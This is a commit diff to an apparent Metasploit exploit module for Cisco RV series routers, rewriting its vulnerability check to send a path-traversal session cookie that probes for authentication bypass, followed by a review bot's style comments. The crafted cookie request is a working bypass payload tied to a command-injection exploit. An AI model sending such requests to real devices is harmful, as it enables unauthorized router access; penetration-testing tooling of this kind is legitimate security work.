Rewrote check method to only abuse authentication bypass. Added additional status checks.
parent
036ed7f467
commit
79b1801a4f
|
@ -88,22 +88,35 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
)
|
||||
end
|
||||
|
||||
# sessionid utilized later needs to be set to length
|
||||
# of 16 or exploit will fail. Tested with lengths
|
||||
# 14-17
|
||||
def generate_session_id
|
||||
return Rex::Text.rand_text_alphanumeric(16)
|
||||
end
|
||||
|
||||
def check
|
||||
# Ripped from jbaines-r7 cisco_rv_series_authbypass_and_rce
|
||||
# Test to see if router is responding and possibly vulnerable
|
||||
res = send_exploit('id')
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => '/upload',
|
||||
'headers' => {
|
||||
'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id
|
||||
}
|
||||
}, 10)
|
||||
|
||||
return CheckCode::Unknown("Didn't receive a response from the target.") if res.nil?
|
||||
|
||||
# Versions 1.0.03.26 and above will respond with 403 Forbidden during exploitation
|
||||
return CheckCode::Safe('The target responded with 403 Forbidden and is not vulnerable.') if res.code == 403
|
||||
|
||||
# Vulnerable versions will respond with 301 Moved Permanently in body of response
|
||||
if res.body.include?('<head><title>301 Moved Permanently</title></head>')
|
||||
return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
|
||||
# A proper "upload" will trigger file creation. So created above is an incorrect "upload" call to avoid file
|
||||
# creation. The router return a status code 405 Not Allowed if authentication has been bypassed by above request.
|
||||
# The firmware containing this authentication bypass also contains the command injection vulnerability that will be
|
||||
# abused during actual exploitation. Non-vulnerable firmware versions will respond with 403 Forbidden.
|
||||
if res.nil?
|
||||
return CheckCode::Unknown('The device did not respond to request packet.')
|
||||
elsif !res.nil? && res.code == 405
|
||||
return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')
|
||||
elsif res.code == 403
|
||||
return CheckCode::Safe('The device is not vulnerable to exploitation.')
|
||||
else # Catch-all
|
||||
return CheckCode::Unknown('The target responded in such a way that exploitation in unknown and unlikely.')
|
||||
end
|
||||
|
||||
CheckCode::Safe('The target did not respond with an expected payload.')
|
||||
end
|
||||
|
||||
def execute_command(cmd, _opts = {})
|
||||
|
@ -116,6 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
if target['Type'] == :linux_dropper
|
||||
fail_with(Failure::Unreachable, 'The target did not respond') unless res
|
||||
fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
|
||||
begin
|
||||
body_json = res.get_json_document
|
||||
|
|
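Review bot: In the new `check`, the branch `elsif !res.nil? && res.code == 405` repeats a nil test that the preceding `if res.nil?` branch has already returned on, so `elsif res.code == 405` is sufficient and reads cleaner. The explicit `return`s inside that if/elsif chain are also unnecessary in Ruby when the chain is the method's final expression, though whether it is depends on which of the trailing lines survive on the new side, which this rendering does not make certain. The same redundancy appears in the second hunk, where `res&.code == 200` follows a fresh `fail_with(Failure::Unreachable, ...) unless res` guard that already rules out nil, so plain `res.code == 200` would do; that hunk's enclosing `execute_command` starts before the hunk and ends after it. It would also help a reader to state in the comment above the 405 branch that a 405 is an indirect indicator (it shows the request reached the upload handler without a valid session, not that command injection is present), since the returned `CheckCode::Appears` message asserts the latter.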